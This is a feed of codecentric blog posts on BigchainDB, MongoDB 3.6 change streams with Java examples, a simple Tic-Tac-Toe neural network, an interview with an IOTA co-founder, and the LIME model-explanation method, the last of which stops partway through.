TDD & BDD

BigchainDB – The lightweight blockchain framework [blockcentric #5]

codecentric Blog - 18 hours 53 min ago

With BigchainDB we see one of the first complete but simple blockchain frameworks. The project strives to make blockchain usable for a large number of developers and use cases without requiring special knowledge in cryptography and distributed systems.

According to benchmarks (whose scripts are also included in the repository), a simple BigchainDB network is able to accept and validate 800 transactions per second (cf. 3-10 tx/s at Bitcoin). This high data throughput is due to the selected Big Data technologies for data persistence. Database systems from this environment use proven mechanisms based on Paxos algorithms to reach a consensus on the status of the data.
MongoDB or RethinkDB can be selected as the underlying database for a BigchainDB. Both options are document-oriented NoSQL databases, which can be scaled horizontally by replication and shaping. They are also schema-free, so that data can be stored in them without the need to globally define a uniform schema.
The throughput of both systems alone can generally be named with more than 80,000 write operations per second.

Transactions in BigchainDB

The framework makes uses of the consensus of the used database cluster. In order to validate transactions, it is also possible to implement your own validation mechanisms.
Two types of transactions are available in BigchainDB. CREATE transactions create an asset, i. e. a collection of data, and link it to at least one owner (its public key). In addition, all assets are “divisible” and can therefore be broken down into different proportions for different owners.
With TRANSFER transactions, complex instructions can be created that link existing assets (and their shares) to conditions of further transactions. In this way, assets and parts of the network can be easily moved between subscribers in the network.
As usual in a blockchain, there is no way to delete an asset or modify its properties.

For a transaction to be validly processed in the network, several conditions must be met.
Once the transaction has been received, the nodes check it for the correct structure. For example, CREATE transactions must contain their asset data while TRANSFER transactions reference the ID of an asset created. Both types also differ in the way they have to deal with inputs and outputs. Of course, each transaction must be signed and hashed before it is transmitted to the network.
If the structure of a transaction is valid, the validity of the contained data is checked. In short, the so-called “double spending” is prevented in this step. This prevents the transaction from repeatedly transferring the same asset or issuing assets that have already issued other transactions.
In addition, you can implement your own validation mechanisms that could check asset generation and transfers for correct functionality, for example. For example, whether realistic dimensions have been assigned for a car part or whether the color code of an automotive paint job exists.

For a deeper understanding of the idea as well as the technical and architectural details of the project, it is recommended to read the BigchainDB Whitepaper, which was maintained until June 2016.

Scenarios and operation of a blockchain

Since the consensus in a BigchainDB is not implemented via public mechanisms such as Proof of Work, Proof of Stake or similar, the technology is more suitable for private blockchains. This means that some parties will form a consortium in order to jointly execute their transactions among themselves without the need for an intermediary. To this end, each participant of this association adds some infrastructure on which at least one node of the blockchain solution is operated. Therefore, each transaction that occurs in the network must be validated and confirmed by a technical and organizational party of the consortium. This approach is very lightweight and does not require participants to be rewarded for their validations. The reward for the participants is, after all, to build up a trusting network without questionable and costly middlemen.

Due to these circumstances, the operation of a private blockchain based on BigchainDB is relatively easy. Each member of the consortium must take care of setting up and maintaining a database and BigchainDB cluster distributed in its infrastructure. In addition, there is of course the holding of a private key to sign his messages to the network. Each organization participating in the network can be identified and verified by in-built certificate management and registry.

One example would be a merger of a number of banks operating payment transactions and information exchange among themselves. Usually, these participants do not fully trust each other and must involve third parties to verify the transactions. However, if this network of banks were to form a consortium that would automate and cryptographically secure each transaction, a third instance would be superfluous and could therefore be excluded.
With a BigchainDB solution in place, each bank would operate its own cluster in its infrastructure that is linked to the network.

BigchainDB is therefore particularly suitable for private blockchain networks with high activity and data volume. This stack is also suitable for archiving solutions in which many data records have to be stored in a trustworthy way for many years. This can be used, for example, to make instances obsolete that call up high service, hardware and license fees for legally compliant data archiving.
Tracking steps in a supply chain can also cover the Bigchain transaction model excellently.

Getting started on the local machine or in IPDB

As a Managed BigchainDB Blockchain network, the Interplanetary Database (IPDB) is now also offered, with which one can interact as a registered organization.

Locally, Bigchain can either be installed directly on the host or operated with a docker. The docker variant is well suited for starting and testing.

In order to develop client applications against the started network, some official and community-maintained drivers are available. From the wide range of Python, JavaScript, Java, Ruby, Haskell and Go, every developer will probably find the right library.

We wish you a lot of fun trying it out.

Our article series “blockcentric” discusses Blockchain-related technology, projects, organization and business concerns. It contains knowledge and findings from our 20% time work, but also news from the area.

Blockcentric Logo
We are looking forward to your feedback on the column and exciting discussions about your use cases.

Previously published blockcentric-Posts

The post BigchainDB – The lightweight blockchain framework [blockcentric #5] appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Change Streams in MongoDB 3.6

codecentric Blog - Sun, 14-Jan-18 23:00

MongoDB 3.6 introduces an interesting API enhancement called change streams. With change streams you can watch for changes to certain collections by means of the driver API. This feature replaces all the custom oplog watcher implementations out there, including the one I used in the article on Near-Realtime Analytics with MongoDB.

For a start, we need to install MongoDB 3.6.0 or a higher version. After setting up a minimal replica set we connect to the primary and set the feature compatibility to 3.6 be able to use change streams (this will hopefully be the default in future version):

use admin
db.adminCommand( { setFeatureCompatibilityVersion: "3.6" } )

I will use the Java driver for the following examples. In order the be able to watch for documents changes, we write a simple program the inserts a bunch of document to a collection test.events:

MongoCollection eventCollection =
    new MongoClient(
        new MongoClientURI("mongodb://localhost:27001,localhost:27002,localhost:27003/test?replicatSet=demo-dev")
    ).getDatabase("test").getCollection("events");

long i = 0;
while (true) {
  Document doc = new Document();
  doc.put("i", i++);
  doc.put("even", i%2);
  eventCollection.insertOne(doc);
  System.out.println("inserted: " + doc);
  Thread.sleep(2000L + (long)(1000*Math.random()));
}

The output of this Java process looks like this:

inserted: Document{{i=1, even=0, _id=5a31187a21d65707e8282fa7}}
inserted: Document{{i=2, even=1, _id=5a31187d21d65707e8282fa8}}
inserted: Document{{i=3, even=0, _id=5a31187f21d65707e8282fa9}}
inserted: Document{{i=4, even=1, _id=5a31188121d65707e8282faa}}
...

In another Java process, we use the same code for retrieving the collection. On that collection we call a method watch with takes a list of aggregation stages, just like the aggregate operation:

ChangeStreamIterable changes = eventCollection.watch(asList(
    Aggregates.match( and( asList(
      in("operationType", asList("insert")),
      eq("fullDocument.even", 1L)))
  )));

We register only for insert operations on the collection and additionally filter for documents with the field even being equal to 1.

Change Streams in MongoDB 3.6

When we iterate over the cursor we just print out the matching documents:

changes.forEach(new Block>() {
  @Override
  public void apply(ChangeStreamDocument t) {
    System.out.println("received: " + t.getFullDocument());
    }
});

The result looks like this:

received: Document{{_id=5a311e2021d657082268f38a, i=2, even=1}}
received: Document{{_id=5a311e2521d657082268f38c, i=4, even=1}}
received: Document{{_id=5a311e2a21d657082268f38e, i=6, even=1}}
...

With change streams, the MongoDB API grows even wider. Now you can quite easily build things that resemble triggers you know from traditional databases. There is no need for external event processing or your own oplog watcher implementation anymore.

The full source code can be found at GitHub.

The post Change Streams in MongoDB 3.6 appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Gamma-TicTacToe – Neural Network and Machine Learning in a simple game

codecentric Blog - Fri, 12-Jan-18 06:52

This post is about implementing a – quite basic – Neural Network that is able to play the game Tic-Tac-Toe. For sure there is not really a need for any Neural Network or Machine Learning model to implement a good – well, basically perfect – computer player for this game. This could be easily achieved by using a brute-force approach. But as this is the author’s first excursion into the world of Machine Learning, opting for something simple seems to be a good idea.

Motivation

The motivation to start working on this post and the related project can be comprised in one word: AlphaGo. The game of Go is definitely the queen of competitive games. Before the age of AlphaGo it was assumed that it would take a really long time until any computer program could beat the best human players, if ever. But unlike the predominant chess programs, AlphaGo is based on some super-advanced – the word really fits here – Neural Network implementation. With this it simply swept away any human top player in the world. Depending on the viewpoint this is amazing, sad, scary or a bit of all.

If this is about the game of Go then why is there a video embedded about playing chess? The engine behind AlphaGo has been developed further. Its latest incarnation is called AlphaZero and it is so generic that it can teach itself different games based only on the rules. There is no human input required anymore, but learning is completely performed using self-play. This is really fascinating, isn’t it? AlphaZero had already easily defeated all its predecessors in the game of Go when it was trained to conquer the world of chess. After only four hours (!) of self-training it crushed the best chess engine around, which in turn would beat any human chess player.

So far for the motivation to start this project, which obviously cannot – and is not intended to – even scratch on the surface of what has been achieved with AlphaZero. Though the project name is clearly inspired by it ;-).

Objectives

Then what should be achieved? Learning about and implementing a Neural Network with some kind of self-learning approach to start with. As the rules of Tic-Tac-Toe are very simple – just play on an empty field – not too much time must be spent implementing the game mechanic as such. This allows focusing on the Neural Network and the learning approach.

Ideally the program should play the game perfectly in the end. This would mean it will never loose to any human player and win if that player does not play the best moves. Tic-Tac-Toe cannot be won by any player if both players are playing decent moves.

The basic – and a little bit less ambitious – objective is that it wins a fair amount of games when playing against a random computer player after some amount of self-learning.

Playing a random computer player

Playing a random computer player is the first assessment of what has been achieved. Then we are going to take a closer look at the implementation, the ideas that did not work and the ideas that worked out in the end.

The complete implementation of Gamma-Tic-Tac-Toe can be found here: https://github.com/ThomasJaspers/gamma-tic-tac-toe. That page also includes instructions on how to compile and run it.

Self-play against the random computer player is implemented in a way that allows independent matches with any amount of games. The Neural Network is re-initialized and trained again between two matches. By default each match consists of 10.000 games and 50 matches are performed. All these values are configurable. The amount of training games are of course also configurable as this is an interesting parameter to test the ability of the Neural Network to learn.

random-vs-random

The match between two random computer players is used to crosscheck the implementation. It is expected that the results are almost totally even as can be also seen in the following chart.

It is easy to make mistakes when validating the results using self-play. In the beginning the Neural Network was always playing the first move. Of course in a game like Tic-Tac-Toe this has let to wrong results. Having two random computer players playing the game this could be detected as it was quite suspicious that one random player was winning far more often than the other one.

chart showing the results of two random players

gamma0-vs-random

The next match is the random computer player vs. an untrained gamma-engine (the fancy name used instead of writing “the Neural Net playing Tic-Tac-Toe”). This is interesting as the matches are going back and forth, but without a clear overall winner or loser. The individual matches are often won quite clearly in comparison to the games played between two random computer players.

chart showing the results of a random computer player vs. an untrained gamma-engine

gamma50-vs-random

Now we are having a gamma-engine that is trained in 50 games against the random computer player before each match. It can be seen that the amount of matches won is clearly increasing in comparison to the untrained version. But there are still quite some matches lost, sometimes even pretty clearly.

chart showing results of a trained gamma-engine

gamma250-vs-random

With 250 training games things are improving a lot. All but one match is won and often quite clearly.

chart showing results of an increasingly trained gamma-engine

gamma500-vs-random

Interestingly the results are pretty much the same as with 250 training runs. This time even two matches are lost. Still it is obvious that the training has a positive effect on playing.

chart showing results from a gamma-engine with 500 trained games

gamma1500-vs-random

So let’s perform 1500 training games before each match. The result is again not changing dramatically, but there is still some improvement.

charts showing some improvement after 1500 training games

gamma15000-vs-random

Finally let’s make a huge jump to 15000 training runs before each match. With this amount of training the Neural Network is winning very consistently and on a high level. This result has been double-checked by executing it several times. The same is true for the other results as well.

chart showing high winning rate after 15000 training runs

The journey to gamma-engine stage-1

The results presented in the previous chapter are based on stage-1 of the gamma-engine. The different stages are intended to differ regarding the amount of learning that is applied. This is not related to the number of training runs, but the factors used to learn something about the game. In stage-1 the “learning algorithm” is based on the following factors: If a game is won the first and the last move of that game are “rewarded”.

This “rewarding the right decisions” is a kind of backpropagation that is often used to train Neural Networks. Even though what has been done here seems to be a bit simpler than what is described in that article.

Therefore the output weights of the corresponding neurons triggering those moves are increased. This does not seem to be a lot of learning at all, but it is enough for the results shown above. Of course this is only possible due to the fact that Tic-Tac-Toe is such a trivial game to play.

There are a lot of articles dealing with Neural Networks and Machine Learning. The corresponding Wikipedia page for example is quite extensive. Therefore this article is focusing on the practical approach towards the specific problem at hand and not so much on the theoretical side of Neural Networks. Still we need some theoretical background to start with.

A Neural Network is composed of different layers. It has an input layer, any amount of hidden layers and an output layer. Theoretically each layer can have any amount of neurons. But the amount of input and output nodes are precluded by the data and the task at hand. Thus practically only hidden layers can have any number of nodes. In this implementation dense layers are used where each neuron of one layer is connected to each neuron of the next layer. There are lots of other layer types where this is not the case. The input to a neuron is an input value representing (a part of) the task to be solved and a weight assigned to that connection. By modifying those weights the Neural Network can learn. The following diagram shows an example of such a Neural Network.

Different layers of a Neural Network

The input layer and the output layer are defined by the values to be processed and the result to be produced. It is pretty clear that there will be one output neuron as we need to generate one move in the end. That move will be the output of that single output neuron.

For the input neurons things are not that straightforward. It is clear that the game state must be passed to the input neurons. On first sight the different possible board representations after making each valid move have been considered as the input. But it is hard to do something meaningful with this in the hidden layer. Furthermore the input neurons would have a different semantic every time. This makes the learning difficult. The next idea has been to map one field from the board to one input neuron. That worked to some extend. The final solution has three input neurons for each field on the board. Those are representing the possible game states: empty, occupied by computer player and occupied by opponent. With this approach it is important that the same field – with its corresponding state – is assigned to the same input neuron every time. This is depicted in the following diagram.

Input Layer with 27 Input Neurons

In addition some input value is required. This is defined based on the different fields and whether or not that field is empty, occupied by the computer player or occupied by the opponent.

Neurons in the hidden layer are calculating a “positional score” for the candidate moves. This is done based on the field values and the input weights. Hereby each neuron in the hidden layer always exactly represents a move to a certain field on the board.

In the beginning every neuron in the hidden layer was calculating a candidate move out of all possible moves. But this approach felt too much like an algorithmic solution through the backdoor.

That’s why there are nine neurons in the hidden layer, as there is at any time a maximum of nine possible moves.

Nine neurons in the hidden layer

Thus the first neuron in the hidden layer stands for a move on the first field, neuron two for a move on the second field and so on. This implies that some neurons cannot “fire” a valid move as the corresponding field is already occupied. This is the equivalent to a threshold that decides whether or not a neuron is activated (fires) or not. If no neuron in the hidden layer can be activated the game is anyway finished as there are no more valid moves anymore.

Activation functions

Activation functions are a vital part of any Neural Network implementation. They are using input values and input weights to calculate output values. Those are the input to the neurons of the next layer or the result computed by the Neural Network. Common to all layers is the randomized generation of output weights when the Neural Network is (re-)initialized. All neurons of one layer are sharing the same implementation of the activation function.

input layer

The activation function of this layer is rather simple. It stores the field information that it has retrieved as an input. Based on this it calculates a value depending on the field state and location on the board. Basically this includes a kind of threshold function. Only one of the three neurons reflecting one field is used as an input in the hidden layer.

hidden layer

For each neuron in the hidden layer a so-called position value is calculated based on the input weights and values. This is done applying the formula below where the sum over all input neurons is created. By doing so the complete board state is considered.

For every set of input neurons that are reflecting the same field the input weight and value of the corresponding neuron is used. This depends on whether the field is empty, owned by the computer or owned by the opponent. Thus from the 27 input neurons always only the nine relevant neurons from the input layer are used for this calculation.

Z = ∑ FIELD_VALUE * INPUT_WEIGHT 

Then the sigmoid function is applied to Z. The sigmoid function is quite commonly used in activation functions of Neural Networks.

S(Z) = 1 / 1 + e-Z

The resulting value is the positional score for this neuron and thus this candidate move.

output layer

In the output layer again a value Z is calculated. But this time not as a sum, but for each of the candidate moves.

Z = POSITION_VALUE * INPUT_WEIGHT

Then again the sigmoid function is applied to Z. The candidate move where S(Z) is the maximum is chosen as the move to execute.

Summary and Outlook

This has been one of the most fun projects for quite some time. Not having any idea where to start was a really interesting experience. Playing around with different parameters like number of neurons and weight changes applied and then seeing how this affects the outcome of playing the game was really fascinating.

Luckily there is still plenty of room for improvements. First of all a more thorough training algorithm can be applied like rewarding all moves that lead to a win and not only the first and the last one. Another idea is to decrease the output weight of neurons if a move has let to a loss.

Then the structure of the Neural Network can be evolved by introducing additional hidden layers and thus increasing the number of neurons and connections between those.

Pretty sure there will be a follow-up to this blog post as one of the main objectives is not yet achieved: A Neural Network that learns to play Tic-Tac-Toe flawlessly :).

The post Gamma-TicTacToe – Neural Network and Machine Learning in a simple game appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Interview with IOTA Co-Founder Dominik Schiener [blockcentric #4]

codecentric Blog - Thu, 11-Jan-18 01:29

Dominik Schiener is one of the co-founders of IOTA – a German non-profit organization that implements a completely new Distributed Ledger Technology competing with blockchain. I talked to Dominik about his early days in the world of Distributed Ledger Technologies, Tangle technology, the IOTA ecosystem, and the future.

Jannik Hüls: Thank you for your time. You are traveling a lot. Where am I catching you right now?

Dominik Schiener: I’m in the headquarters of Deutsche Telekom in Bonn. We are set up internationally, which involves a lot of traveling. We have offices in Berlin, Oslo, Chicago, and are in the process of opening one in Singapore.

Let’s talk about your history: The world of Distributed Ledger Technologies (DLT) is not that old yet. When was your first encounter with that topic – how did you hear about blockchain?

My first point of contact was in 2011, when I came across the Bitcoin whitepaper and tried to understand it. Back then, I was 14 or 15 years old, my English was not that good yet, and I didn’t fully grasp the concept. But I was quickly fascinated – I’ve always been the curious type – so that I have worked on it full time since 2012. I started by mining. Everyone kept telling me this was how you made big money, and of course that’s why I was really ambitious from the outset. I wanted to become an entrepreneur and started my own projects at the age of 14. With AWS credits I mined and thus earned quite a lot of money. I then used this money to implement my first own projects.

So basically mining was your main field of application. Or did you actually implement something back then, did you see other options besides cryptocurrencies?

The main focus back then was on cryptocurrency. It was not until 2013 that I really understood the value added, applications that are interesting not just from a financial point of view, but where blockchain itself creates added value.

Before we talk about IOTA: currently, the topic of DLT covers a wide range of things. To you, what defines a use case that lends itself to applying DLT?

If we look at time-to-implement or time-to-market, a blockchain solution for supply chain management is the one most likely to be integrated within the next two to five years. In supply chains, it creates the greatest added value. Thanks to the underlying transparency, we can identify inefficient processes and improve things like insurance.

“A blockchain solution for supply chain management is the one most likely to be integrated within the next two to five years.”

Tangle is the foundation of IOTA. How did the idea for the Tangle come about?

Since we had a startup developing new hardware for IT, or Fog Computing, to be precise, the basic idea was to have the machines pay each other – machine payments to buy and sell resources. Since we are also blockchain experts, our technical know-how was good enough to realize that none of the existing blockchain architectures were able to cater to the demands of the IoT space. Many had fundamental technical flaws and were too slow or too costly. So we did some research on Directed Acyclic Graphs to solve the existing problems. We did the mathematical proofs, and that’s how we developed IOTA.

Can you briefly outline the differences between IOTA and blockchain?

There are two major differences: The architecture is no longer a chain, but a Directed Acyclic Graph. And the way consensus is reached is different: [with blockchain,] miners use the Competitive Proof of Work or another consensus algorithm that validates transactions in cycles. In IOTA there are no cycles like in blockchain. When transactions are executed in IOTA, two older transactions must be confirmed. There are no more miners, but whenever someone in the network performs a transaction, they also contribute to the consensus of the network, which is one of the main benefits.

Another advantage is scalability. IOTA scales horizontally: the more network participants, the faster transactions are confirmed. Plus, there are no transaction fees because there are no miners left to substitute. This means that no expenses have to be paid because everyone participates in the validation process. Other benefits include partition tolerance and the fact that quantum computers can no longer attack our hashes.

You mentioned the IoT as possible use case – is there a difference between Full Nodes and Small Nodes? Does every IoT device need to store the entire tangle? And how big is it when it’s stored?

Right now there are only Full Nodes, but we are also developing Light Nodes and Small Nodes. Small Nodes are clusters of devices that are combined. In this cluster, they will use a Full Node that meets, for example, the more demanding requirements. However, these very questions depend very much on the architecture of future systems. So, what do they really look like in the future? How do the IoT devices interact?

That’s why the concept of Fog Computing is so relevant to us. The interesting thing about IOTA is that you can really outsource all processes that are involved in running a transaction to different devices. Every IoT device can have its own signature, which means: every IoT device can have a wallet. Even my coffee machine. The second step is Tip Selection. IOTA can find two transactions that need to be confirmed. For that I have to be a Full Node or a Light Node. This Tip Selection algorithm can then really be executed by the node, and thus the coffee machine can also make a transaction by interacting with the Full Node. We imagine this as a SmartHub within our own four walls. The final process is the proof of work, which is a bit more computation-intensive. That’s why we work on special hardware – especially for Fog Computing.

You said that the big advantage of IOTA is that there are no transaction costs. What’s the incentive for the miner then – why should I run a Full Node?

That’s one of the biggest misconceptions: There is no incentive to run a Full Node in Bitcoin and Ethereum. A Full Node is not necessarily a miner. There are about 5,000 to 6,000 Full Nodes in Bitcoin, but only a small fraction of these Full Nodes are miners. The advantage of IOTA is that the effort related to the validation process is much lower compared to Ethereum or Bitcoin. This means it’s better to run an IOTA Full Node than a Bitcoin or Ethereum Full Node. A node runs to be able to participate in the network.

“The advantage of IOTA is that the effort related the validation process is much lower compared to Ethereum or Bitcoin. This means it’s better to run an IOTA Full Node than a Bitcoin or Ethereum Full Node.”

In terms of business organization, IOTA deliberately sets itself apart from other DLT startups. You are a German non-profit organization. What’s the rationale behind this step?

It was of course a strategic move. We realized that the potential of the technology is simply too big to be limited by patents – that’s a conflict of interest. This is why this foundation idea makes so much sense, because the base layer, i.e. IOTA, should be free to use and open source. It should be used as widely as possible. In our opinion, the foundation is the best way to promote adoption. That’s why non-profit makes sense. Our goal is to bring together big companies, startups, and governments to build an ecosystem and invest. Since it is agnostic and independent, other companies are very interested in working with us rather than, for example, IBM.

Initially you also did an ICO [Initial Coin Offering], but you sold all IOTA tokens. How is the foundation funded?

We sold 100 percent of the tokens, then said to the community: if you want a foundation, you’ll need to donate money. As a result, the community got together and donated five percent of the tokens, which currently makes up about 200 million Euros. This is how the foundation is funded.

In other words, the value of the currency IOTA is also fundamental to the financial resources of the foundation.

Exactly. Now we bring companies on board, who then donate to the foundation. And we work with governments.

For example, the Data Marketplace is currently implementing a use case based on IOTA. There, data can be paid with micropayment.

Interesting. How do you explain the volatility of the market? How can I sell this use case better? When I buy something today, it costs, let’s say, 1000 IOTAs, which is perhaps 5 Euros, and tomorrow it might cost 50 Euros.

This is one of the biggest problems in IOTA and one of the biggest problems of cryptocurrencies in general. Volatility is in direct conflict with usability. One could think about an additional layer in which the use of the cryptocurrency is abstracted and that allows for payment in Euros, for example. However, our vision for IOTA is that the tokens are actually used. With other cryptocurrencies, the token is useless. We do not want a network in which each institution maintains its own token. This leads to a way too fragmented ecosystem. Nevertheless, the usability of the token is problematic and remains an unresolved issue.

Currently there are a lot of news about you after you announced Masked Authentication Messaging, Payment Channels, the Data Marketplace, and many other things. Can you roughly tell us what direction you are headed in? I assume you have more things in the pipeline.

We focus on the announcements, especially the partnerships we start with big companies. There, we are able to integrate IOTA into large-scale existing ecosystems. This is how we really get a scaling effect – where we can deploy thousands of nodes. But I can’t say more about this right now.

At codecentric, we are developers. Are there any SDKs [Software Development Kits] for IOTA?

As a matter of fact, we are working on this, especially for the modules that we develop. In terms of IOTA development, we are currently at the point where we have the IRI client to join the network and execute the transactions. Over the past few months, we’ve been working on a completely new system architecture which implements microservices and which is enterprise-oriented. You see, right now we just have one monolithic block, just as Ethereum or Bitcoin.

In addition, the IRI client is becoming much more modular. So as a company you can decide what communication protocol you want to use, and what database, be it SAP Hana or Redis. This really is the future of IOTA and it will be one of the best releases ever. Hopefully it’ll come in February, right now it’s still being developed and thoroughly tested.

There is a sandbox and a test net for developers. Are these the best ways to validate a proof of concept, or what’s the easiest way to go?

We are presently improving the entire sandbox environment. Our goal is that developers only need to send out an API call, and we then take care of the deployments. We are currently cooperating with some companies because they are so interested in IOTA that they also help the network by managing the deployments.

Looking at the Data Marketplace as use case for application developers: what is really stored in the Tangle? Or is it just about paying for the sensor data? Can you roughly outline the architecture?

Of course, the sensor data are represented in the Tangle. In IOTA, a transaction can contain about 1.2 kilobytes of data. In other words, if I have a sensor just for temperature logging or a small dataset, I can use IOTA for data transfer. This is how IOTA also ensures the integrity of the data. If someone wants to buy the data of a sensor, this will be billed directly by micropayment. The data is then not read by the sender, but from the tangle.

So basically the sensor pushes data into the Tangle, and I as a consumer can use the data from the Tangle to read sensor data. Pretty cool.

Finally, to reiterate: you talked about the IRI earlier. I’ve already seen that’s open source. What else is?

Everything. The Data Marketplace will also be open source. We also want to make other use cases, such as SatoshiPay, available to the community. We are not done with that, though, we are still working on it.

Thank you for your time. Cool stuff you’re working on, and fun to follow. Have a great time in Bonn!

 

Thank you, Jannik!

 

The interview was conducted in German and then translated into English.

Our article series “blockcentric” discusses Blockchain-related technology, projects, organization and business concerns. It contains knowledge and findings from our 20% time work, but also news from the area.

Blockcentric Logo
We are looking forward to your feedback on the column and exciting discussions about your use cases.

Previously published blockcentric-Posts

The post Interview with IOTA Co-Founder Dominik Schiener [blockcentric #4] appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Looking beyond accuracy to improve trust in machine learning

codecentric Blog - Tue, 09-Jan-18 04:00

Traditional machine learning workflows focus heavily on model training and optimization; the best model is usually chosen via performance measures like accuracy or error and we tend to assume that a model is good enough for deployment if it passes certain thresholds of these performance criteria. Why a model makes the predictions it makes, however, is generally neglected. But being able to understand and interpret such models can be immensely important for improving model quality, increasing trust and transparency and for reducing bias. Because complex machine learning models are essentially black boxes and too complicated to understand, we need to use approximations to get a better sense of how they work. One such approach is LIME, which stands for Local Interpretable Model-agnostic Explanations and is a tool that helps understand and explain the decisions made by complex machine learning models.

Accuracy and Error in Machine Learning

A general Data Science workflow in machine learning consists of the following steps: gather data, clean and prepare data, train models and choose the best model based on validation and test errors or other performance criteria. Usually we – particularly we Data Scientists or Statisticians who live for numbers, like small errors and high accuracy – tend to stop at this point. Let’s say we found a model that predicted 99% of our test cases correctly. In and of itself, that is a very good performance and we tend to happily present this model to colleagues, team leaders, decision makers or whoever else might be interested in our great model. And finally, we deploy the model into production. We assume that our model is trustworthy, because we have seen it perform well, but we don’t know why it performed well.

In machine learning we generally see a trade-off between accuracy and model complexity: the more complex a model is, the more difficult it will be to explain. A simple linear model is easy to explain because it only considers linear relationships between variables and predictor. But since it only considers linearity, it won’t be able to model more complex relationships and the prediction accuracy on test data will likely be lower. Deep Neural Nets are on the other end of the spectrum: since they are able to deduce multiple levels of abstraction, they are able to model extremely complex relationships and thus achieve very high accuracy. But their complexity also essentially makes them black boxes. We are not able to grasp the intricate relationships between all features that lead to the predictions made by the model so we have to use performance criteria, like accuracy and error, as a proxy for how trustworthy we believe the model is.

Trying to understand the decisions made by our seemingly perfect model usually isn’t part of the machine learning workflow.
So why would we want to invest the additional time and effort to understand the model if it’s not technically necessary?

One way to improve understanding and explain complex machine learning models is to use so-called explainer functions. There are several reasons why, in my opinion, model understanding and explanation should become part of the machine learning workflow with every classification problem:

  • model improvement
  • trust and transparency
  • identifying and preventing bias

Model Improvement

Understanding the relationship between features, classes and predictions, thereby understanding why a machine learning model made the decisions it made and which features were most important in that decision can help us decide if it makes intuitive sense.

Let’s consider the following poignant example from the literature: we have a deep neural net that learned to distinguish images of wolves from huskies [1]; it was trained on a number of images and tested on an independent set of images. 90 % of the test images were predicted correctly. We could be happy with that! But what we don’t know without running an explainer function is that the model based its decisions primarily on the background: wolf images usually had a snowy background, while husky images rarely did. So we unwittingly trained a snow detector… Just by looking at performance measures like accuracy, we would not have been able to catch that!

Having this additional knowledge about how and based on which features model predictions were made, we can intuitively judge whether our model is picking up on meaningful patterns and if it will be able to generalize on new instances.

Trust and Transparency

Understanding our machine learning models is also necessary to improve trust and provide transparency regarding their predictions and decisions. This is especially relevant given the new General Data Protection Regulation (GDPR) that will go into effect in May of 2018. Even though it is still hotly discussed whether its Article 22 includes a “right to explanation” of algorithmically derived decisions [2], it probably won’t be enough for long any more to have black box models making decisions that directly affect people’s lives and livelihoods, like loans [3] or prison sentences [4].

Another area where trust is particularly critical is medicine; here, decision will potentially have life-or-death consequences for patients. Machine learning models have been impressively accurate at distinguishing malignant from benign tumors of different types. But as basis for (no) medical intervention we still require a professional’s explanation of the diagnosis. Providing the explanation for why a machine learning model classified a certain patient’s tumor as benign or malignant would go a long way to help doctors trust and use machine learning models that support them in their work.

Even in everyday business, where we are not dealing with quite so dire consequences, a machine learning model can have very serious repercussions if it doesn’t perform as expected. A better understanding of machine learning models can save a lot of time and prevent lost revenue in the long run: if a model doesn’t make sensible decisions, we can catch that before it goes into deployment and wreaks havoc there.

Identifying and Preventing Bias

Fairness and bias in machine learning models is a widely discussed topic [5, 6]. Biased models often result from biased ground truths: if the data we use to train ours model contains even subtle biases, our models will learn them and thus propagate a self-fulfilling prophecy! One such (in)famous example is the machine learning model that is used to suggest sentence lengths for prisoners, which obviously reflects the inherent bias for racial inequality in the justice system [4]. Other examples are models used for recruiting, which often show the biases our society still harbors in terms of gender-associations with specific jobs, like male software engineers and female nurses [5].

Machine learning models are a powerful tool in different areas of our life and they will become ever more prevalent. Therefore, it is our responsibility as Data Scientists and decision makers to understand how the models we develop and deploy make their decisions so that we can proactively work on preventing bias from being reinforced and removing it!

LIME

LIME stands for Local Interpretable Model-agnostic Explanations and is a tool that helps understand and explain the decisions made by complex machine learning models. It has been developed by Marco Ribeiro, Sameer Singh and Carlos Guestrin in 2016 [1] and can be used to explain any classification model, whether it is a Random Forest, Gradient Boosting Tree, Neural Net, etc. And it works on different types of input data, like tabular data (data frames), images or text.

At its core, LIME follows three concepts:

  • explanations are not given globally for the entire machine learning model, but locally and for every instance separately
  • explanations are given on original input features, even though the machine learning model might work on abstractions
  • explanations are given for the most important features by locally fitting a simple model to the prediction

This allows us to get an approximate understanding of which features contributed most strongly to a single instance’s classification and which features contradicted it and how they influenced the prediction.

The following example showcases how LIME can be used:
I built a Random Forest model on a data set about Chronic Kidney Disease [7]. The model was trained to predict whether a patient had chronic kidney disease (ckd) or not (notckd). The model achieved 99 % accuracy on validation data and 95 % on test data. Technically, we could stop here and declare victory. But we want to understand why certain patients were diagnosed with chronic kidney disease and why others weren’t. A medical professional would then be able to assess whether what the model learned makes intuitive sense and can be trusted. To achieve this, we can apply LIME.

As described above, LIME works on each instance individually and separately. So first, we take one instance (in this case the data from one patient) and permute it; i.e. the data is replicated with slight modifications. This generates a new data set consisting of similar instances, based on one original instance. For every instance in this permuted data set we also calculate how similar it is to the original instance, i.e. how strong the modifications made during permutation are. Basically, any type of statistical distance and similarity metric can be used in this step, e.g. Euclidean distance converted to similarity with an exponential kernel of specified width.
Next, our complex machine learning model, which was trained before, will make predictions on every permuted instance. Because of the small differences in the permuted data set, we can keep track of how these changes affect the predictions that are made.

And finally, we fit a simple model (usually a linear model) to the permuted data and its predictions using the most important features. There are different ways to determine the most important features: we typically define the number of features we want to include in our explanations (usually around 5 to 10) and then either

  • choose the features with highest weights in the regression fit on the predictions made by the complex machine learning model
  • apply forward selection, where features are added to improve the regression fit on the predictions made by the complex machine learning model
  • choose the features with smallest shrinkage on the regularization of a lasso fit on the predictions made by the complex machine learning model
  • or fit a decision tree with fewer or equal number of branch splits as the number of features we have chosen

The similarity between each permuted instance and the original instance feeds as a weight into the simple model so that higher importance is given to instances which are more similar to the original instance. This precludes us from using any simple model as an explainer that is able to take weighted input, e.g. a ridge regression.

Now, we can interpret the prediction made for the original instance. With the example model described above, you can see the LIME output for the eight most important features for six patients/instances in the figure below:

LIME explanations of example machine learning model

